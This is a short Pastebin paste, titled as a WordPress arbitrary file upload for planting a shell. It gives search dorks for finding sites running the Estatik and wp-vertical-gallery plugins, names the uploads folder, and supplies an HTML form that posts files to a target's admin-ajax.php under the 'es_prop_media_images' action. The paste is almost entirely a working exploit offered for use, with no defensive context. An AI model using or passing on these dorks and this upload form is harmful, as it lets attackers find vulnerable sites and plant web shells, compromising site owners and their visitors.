Advertisement
finderabc

Wordpress Arbitrary File Upload (shell)

Jan 21st, 2019
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. [+] Dorks :
  2.  
  3. index of "/wp-content/plugins/estatik"
  4. index of "/wp-content/plugins/wp-vertical-gallery/"
  5.  
  6. [+] Folder Arbitrary :
  7.  
  8. /wp-content/uploads/
  9.  
  10. [+] Exploits :
  11.  
  12. <html> <body> <form action="target.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
  13. <input type="hidden" name="action" value="es_prop_media_images" />
  14. <input type="file" name="es_media_images[]" />
  15. <input type="submit" value="Submit" />
  16. </form>
  17. </body>
  18. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement